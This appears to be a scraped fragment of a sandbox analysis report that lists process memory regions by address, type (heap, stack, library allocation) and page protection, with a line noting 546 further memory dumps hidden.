20D5BCB5000
|
heap
|
page read and write
|
||
|
227A85D0000
|
trusted library allocation
|
page read and write
|
||
|
1CBF5D5B000
|
trusted library allocation
|
page read and write
|
||
|
40CAFE000
|
stack
|
page read and write
|
||
|
25DC8800000
|
heap
|
page read and write
|
||
|
1AC543D0000
|
trusted library allocation
|
page read and write
|
||
|
1CBF1015000
|
heap
|
page read and write
|
||
|
20D5C402000
|
heap
|
page read and write
|
||
|
9D496F9000
|
stack
|
page read and write
|
||
|
205EE42F000
|
heap
|
page read and write
|
||
|
EE286FF000
|
stack
|
page read and write
|
||
|
20D5C5AA000
|
heap
|
page read and write
|
||
|
227A3827000
|
heap
|
page read and write
|
There are 546 hidden memdumps, click here to show them.